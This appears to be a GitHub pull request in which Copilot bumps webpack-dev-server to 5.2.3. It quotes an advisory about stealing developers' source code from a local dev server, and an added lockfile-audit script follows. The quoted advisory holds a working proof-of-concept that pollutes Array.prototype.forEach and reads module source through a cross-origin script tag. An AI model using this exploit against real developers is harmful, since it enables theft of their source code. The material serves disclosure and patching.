
#9017 Refactor: webpack-dev-server users' source code may be stolen when they access a malicious web site #9033

Open
Copilot wants to merge 2 commits into master from copilot/refactor-webpack-dev-server-security-again


Copilot AI commented Jan 26, 2026

How the feature works? / How did you fix the issue?

  • Summary: Dev-server could leak source when loaded cross-origin via prototype pollution on the runtime iterator.
  • Changes:
    • Dependencies: override webpack-dev-server to latest patched v5.2.3.
    • Lockfile: refreshed to pull the patched dev-server release across workspaces.
  • Example:
    {
      "overrides": {
        "nth-check": "^2.1.1",
        "webpack-dev-server": "^5.2.3"
      }
    }

Check list

  • unit-tests written
  • e2e-tests written
  • documentation updated
  • PR name follows the pattern #1234 – issue name
  • branch name doesn't contain '#'
  • PR is linked with the issue
  • base branch (master or release/xx) is correct
  • task status changed to "Code review"
  • reviewers are notified about the pull request
Original prompt

This section details the original issue you should resolve

<issue_title>Refactor: webpack-dev-server users' source code may be stolen when they access a malicious web site</issue_title>
<issue_description>

### Summary

Source code may be stolen when you access a malicious web site.

### Details

Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject <script src="http://localhost:8080/main.js"> in their site and run the script. Note that the attacker has to know the port and the output entrypoint script path. Combined with prototype pollution, the attacker can get a reference to the webpack runtime variables.
By using Function::toString against the values in __webpack_modules__, the attacker can get the source code.

### PoC

1. Download [reproduction.zip](https://github.com/user-attachments/files/18426585/reproduction.zip) and extract it
2. Run `npm i`
3. Run `npx webpack-dev-server`
4. Open `https://e29c9a88-a242-4fb4-9e64-b24c9d29b35b.pages.dev/`
5. You can see the source code output in the document and the devtools console.

The script in the POC site is:


    let moduleList
    const onHandlerSet = (handler) => {
      console.log('h', handler)
      moduleList = handler.require.m
    }

    const originalArrayForEach = Array.prototype.forEach
    Array.prototype.forEach = function forEach(callback, thisArg) {
      callback((handler) => {
        onHandlerSet(handler)
      })
      originalArrayForEach.call(this, callback, thisArg)
      Array.prototype.forEach = originalArrayForEach
    }

    const script = document.createElement('script')
    script.src = 'http://localhost:8080/main.js'
    script.addEventListener('load', () => {
      console.log(moduleList)
      for (const key in moduleList) {
        const p = document.createElement('p')
        const title = document.createElement('strong')
        title.textContent = key
        const code = document.createElement('code')
        code.textContent = moduleList[key].toString()
        p.append(title, ':', document.createElement('br'), code)
        document.body.appendChild(p)
      }
    })
    document.head.appendChild(script)

This script uses the function generated by [renderRequire](https://github.com/webpack/webpack/blob/3919c844eca394d73ca930e4fc5506fb86e2b094/lib/javascript/JavascriptModulesPlugin.js#L1383).

    // The require function
    function __webpack_require__(moduleId) {
        // Check if module is in cache
        var cachedModule = __webpack_module_cache__[moduleId];
        if (cachedModule !== undefined) {
            return cachedModule.exports;
        }
        // Create a new module (and put it into the cache)
        var module = __webpack_module_cache__[moduleId] = {
            // no module.id needed
            // no module.loaded needed
            exports: {}
        };
        // Execute the module function
        var execOptions = {
            id: moduleId,
            module: module,
            factory: __webpack_modules__[moduleId],
            require: __webpack_require__
        };
        __webpack_require__.i.forEach(function(handler) {
            handler(execOptions);
        });
        module = execOptions.module;
        execOptions.factory.call(module.exports, module, module.exports, execOptions.require);
        // Return the exports of the module
        return module.exports;
    }

Especially, it uses the fact that Array::forEach is called for __webpack_require__.i and execOptions contains __webpack_require__.
It uses prototype pollution against Array::forEach to extract __webpack_require__ reference.

### Impact

This vulnerability can result in source code being stolen for users that use a predictable port and output path for the entrypoint script.

### Solution

Update webpack-dev-server package to latest version</issue_description>

Comments on the Issue (you are @copilot in this section)



Co-authored-by: AlexeyGirin <26869421+AlexeyGirin@users.noreply.github.com>
Copilot AI changed the title [WIP] Refactor webpack-dev-server to prevent source code theft Refactor: webpack-dev-server users' source code may be stolen when they access a malicious web site Jan 26, 2026
Copilot AI requested a review from AlexeyGirin January 26, 2026 17:36
@AlexeyGirin AlexeyGirin marked this pull request as ready for review January 26, 2026 18:52
@AlexeyGirin AlexeyGirin changed the title Refactor: webpack-dev-server users' source code may be stolen when they access a malicious web site #9017 Refactor: webpack-dev-server users' source code may be stolen when they access a malicious web site Jan 26, 2026
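
A check a reviewer could run to confirm that the lockfile refresh described in this PR left no `webpack-dev-server` copy below 5.2.3 in any workspace. This is an added example, not code from the PR or the project; `findOutdated`, `compareVersions` and the sample lockfile are constructed for illustration, and it assumes an npm `package-lock.json` with the lockfileVersion 2 or 3 `packages` map.

```javascript
// Added example: audit a parsed package-lock.json for webpack-dev-server
// installs older than the patched version named in the PR description.
const MIN_VERSION = '5.2.3';

// Compare two x.y.z versions numerically; a prerelease suffix is ignored.
function compareVersions(a, b) {
  const pa = a.split('-')[0].split('.').map(Number);
  const pb = b.split('-')[0].split('.').map(Number);
  for (let i = 0; i < 3; i++) {
    const d = (pa[i] || 0) - (pb[i] || 0);
    if (d !== 0) return d < 0 ? -1 : 1;
  }
  return 0;
}

// Return every install path of `name` whose locked version is below `min`.
function findOutdated(lock, name = 'webpack-dev-server', min = MIN_VERSION) {
  const suffix = `node_modules/${name}`;
  const findings = [];
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    // Match hoisted, nested and workspace-local copies, but not
    // packages whose name merely starts with or contains `name`.
    if (path !== suffix && !path.endsWith('/' + suffix)) continue;
    // Workspace symlink entries ("link": true) carry no version.
    if (meta.link || !meta.version) continue;
    if (compareVersions(meta.version, min) < 0) {
      findings.push({ path, version: meta.version });
    }
  }
  return findings;
}

// Constructed sample: one patched hoisted copy, two stale nested copies,
// and one unrelated package with a similar name.
const sampleLock = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'constructed-monorepo' },
    'node_modules/webpack-dev-server': { version: '5.2.3' },
    'packages/app-a/node_modules/webpack-dev-server': { version: '4.15.1' },
    'node_modules/legacy-tool/node_modules/webpack-dev-server': { version: '5.2.0' },
    'node_modules/webpack-dev-server-extra': { version: '1.0.0' },
  },
};

for (const f of findOutdated(sampleLock)) {
  console.log(`${f.path}: ${f.version} is below ${MIN_VERSION}`);
}
```

To audit a real repository, pass the result of `JSON.parse` on its `package-lock.json` to `findOutdated`; an empty array means every locked copy is at or above the pinned version.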